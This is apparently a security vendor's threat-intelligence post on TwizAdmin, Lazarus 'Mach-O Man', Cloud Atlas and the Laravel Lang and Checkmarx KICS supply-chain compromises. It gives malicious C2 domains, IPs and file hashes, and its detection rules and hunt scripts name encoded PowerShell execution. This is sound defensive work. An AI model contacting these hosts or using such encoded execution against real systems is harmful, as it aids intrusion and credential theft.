Back to Intelligence

TwizAdmin MaaS & Lazarus Mach-O Man: OTX Pulse Analysis — Credential Theft & Supply Chain Attacks

SA
Security Arsenal Team
May 26, 2026
6 min read

Threat Summary

Recent intelligence from OTX pulses indicates a convergence of high-impact credential theft operations targeting both endpoints and the software supply chain. The landscape is dominated by the DataBreachPlus group deploying the TwizAdmin Malware-as-a-Service (MaaS) suite, which couples cryptocurrency clipping with ransomware capabilities. Simultaneously, Lazarus Group has intensified operations against the financial sector using the "Mach-O Man" macOS malware via ClickFix social engineering.

Parallel to these direct attacks, Cloud Atlas (Inception Framework) is actively targeting government entities in Russia and Belarus with updated tooling (PowerCloud, VBCloud), while a separate supply chain campaign has compromised critical developer tools, specifically Laravel Lang packages and the official Checkmarx KICS Docker images. These supply chain intrusions facilitate the deployment of webshells (helpers.php) and information stealers (mcpAddon.js), creating a broad attack surface for credential harvesting.

Threat Actor / Malware Profile

1. TwizAdmin (DataBreachPlus)

  • Type: Malware-as-a-Service (MaaS)
  • Malware Families: TwizAdmin, crpx0 (Ransomware)
  • Distribution: Phishing campaigns impersonating logistics/shipping (FedEx).
  • Behavior: Multi-stage payload starting as a clipper for 8+ crypto chains. Exfiltrates BIP-39 seed phrases and browser credentials.
  • C2: FastAPI-based panel; observed C2 at 103.241.66[.]238:1337.
  • Persistence: Uses scheduled tasks and registry run keys.

2. Mach-O Man (Lazarus Group)

  • Type: APT / Cyber-Espionage
  • Malware Families: Mach-O Man, PyLangGhostRAT
  • Distribution: ClickFix attacks via fake meeting invites on Telegram.
  • Behavior: Prompts users to execute terminal commands impersonating software updates (Zoom/Teams). Steals browser data and system info.
  • Exfiltration: Uses Telegram for C2 communication.

3. Cloud Atlas (Inception Framework)

  • Type: APT
  • Target: Government entities in Russia/Belarus.
  • Malware Families: PowerCloud, VBCloud, PowerShower
  • Behavior: Delivered via phishing ZIPs containing malicious LNK shortcuts. PowerCloud exfiltrates data to C2; PowerShower performs network recon.

4. Supply Chain Actors (Laravel & KICS)

  • Laravel Lang: Backdoored helpers.php files facilitating RCE and info stealing.
  • Checkmarx KICS: Poisoned Docker Hub images (v2.1.20, v2.1.21, alpine) and VS Code extensions (1.17.0, 1.19.0) deploying mcpAddon.js and Canister Worm.

IOC Analysis

Indicator Types Operationalization:

  • Domains: Several new domains registered for C2 and payload delivery (fanonlyatn.xyz, livemicrosft.com, flipboxstudio.info). SOC teams should immediately block these at the proxy/DNS level and add to threat intelligence feeds.
  • File Hashes: A mix of SHA256 (Windows/macOS binaries) and MD5 (Legacy components). These should be loaded into EDR solutions for quarantine and hunting.
  • IPs: Specific IPs associated with Cloud Atlas (46.17.44.125, 195.58.49.9) should be blocked at perimeter firewalls.

Tooling:

  • Decoding: The TwizAdmin C2 panel uses FastAPI; network analysis tools (Zeek/Wireshark) should filter for HTTP/JSON patterns on non-standard ports (e.g., 1337).
  • Hunting: Use YARA rules matching the specific binary structures of Mach-O Man and the PowerCloud PowerShell scripts.

Detection Engineering

The following detection logic targets the specific execution chains, C2 patterns, and supply chain artifacts identified in the pulses.

YAML
---
title: Potential Laravel Helpers.php Backdoor Creation
id: 9d8f7a6b-c5d4-4e3f-8a2b-1c9d0e8f7a6b
description: Detects the creation or modification of helpers.php in web directories, a pattern associated with the Laravel Lang compromise.
status: experimental
date: 2026/05/26
author: Security Arsenal
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\\vendor\\laravel-lang\\'
      - '\\lang\\'
    TargetFilename|endswith:
      - '\\helpers.php'
  condition: selection
falsepositives:
  - Legitimate developer updates to language files
level: high
---
title: Suspicious PowerShell Command Line Encoded
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects encoded PowerShell command lines often used by Cloud Atlas and TwizAdmin for initial payload execution.
status: experimental
date: 2026/05/26
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\\powershell.exe'
      - '\\pwsh.exe'
    CommandLine|contains:
      - ' -enc '
      - ' -EncodedCommand '
      - 'FromBase64String'
  condition: selection
falsepositives:
  - System administration scripts
level: medium
---
title: TwizAdmin or Mach-O Man C2 Domain Connection
id: 7f8e9d0c-1b2a-3c4d-5e6f-7a8b9c0d1e2f
description: Detects network connections to known C2 domains associated with TwizAdmin and Lazarus Mach-O Man campaigns.
status: experimental
date: 2026/05/26
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    DestinationHostname|contains:
      - 'fanonlyatn.xyz'
      - 'livemicrosft.com'
      - 'flipboxstudio.info'
      - 'allgoodsdirect.com.au'
      - 'istochnik.org'
  condition: selection
falsepositives:
  - Rare, unlikely legitimate traffic
tags:
  - c2
  - infostealer
level: critical


**KQL (Microsoft Sentinel)**
kql
// Hunt for File Hash IOCs across DeviceFileEvents
let MalwareHashes = dynamic(["06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4", "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90", "d47de3772f2d61a043e7047431ef4cf4"]);
DeviceFileEvents
| where SHA256 in (MalwareHashes) or MD5 in (MalwareHashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
| extend Alert = "Malware File Hash Detected"
;
// Hunt for Network IOCs
let C2Domains = dynamic(["fanonlyatn.xyz", "livemicrosft.com", "flipboxstudio.info", "istochnik.org"]);
DeviceNetworkEvents
| where RemoteUrl in (C2Domains)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName
| extend Alert = "C2 Communication Detected"


**PowerShell Hunt Script**
powershell
# IOC Hunter for TwizAdmin, Mach-O Man, and KICS Artifacts
# Requires Administrator privileges for full file system access

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "d47de3772f2d61a043e7047431ef4cf4",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b"
)

$ScanPaths = @("C:\Users\", "C:\ProgramData\", "C:\\inetpub\\wwwroot")

Write-Host "[!] Starting IOC Scan for Dark Web Credential Theft Malware..." -ForegroundColor Cyan

foreach ($Path in $ScanPaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning $Path..." -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $File = $_
            if ($File.Length -gt 0) {
                try {
                    $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                    if ($TargetHashes -contains $Hash) {
                        Write-Host "[!] MALICIOUS FILE FOUND: $($File.FullName)" -ForegroundColor Red
                        Write-Host "    Hash: $Hash" -ForegroundColor Red
                    }
                } catch {
                    # Ignore file access errors
                }
            }
        }
    }
}

# Check for Laravel Compromise Artifacts
$WebRoots = @("C:\inetpub\", "C:\xampp\", "C:\wamp64\")
Write-Host "[*] Checking for Laravel helpers.php backdoors..." -ForegroundColor Yellow
foreach ($Root in $WebRoots) {
    if (Test-Path $Root) {
        Get-ChildItem -Path $Root -Filter "helpers.php" -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            Write-Host "[!] Suspicious helpers.php found: $($_.FullName)" -ForegroundColor Yellow
        }
    }
}

Write-Host "[*] Scan Complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block all IOCs (Domains fanonlyatn.xyz, livemicrosft.com; IPs 46.17.44.125, 103.241.66.238) at perimeter firewalls and proxies. Quarantine endpoints with file hash matches.
  • 24h: Force password resets for developer accounts (due to Laravel/KICS compromise) and users with access to crypto wallets (due to TwizAdmin). Initiate credential stuffing checks.
  • 1 week: Conduct a comprehensive audit of Docker Hub images and VS Code extensions in use. Validate integrity of Laravel language packages (laravel-lang/lang). Review macOS endpoint security against ClickFix social engineering vectors.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialstwizadminmach-o-manlaravel-rcecloud-atlassupply-chain-attack

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action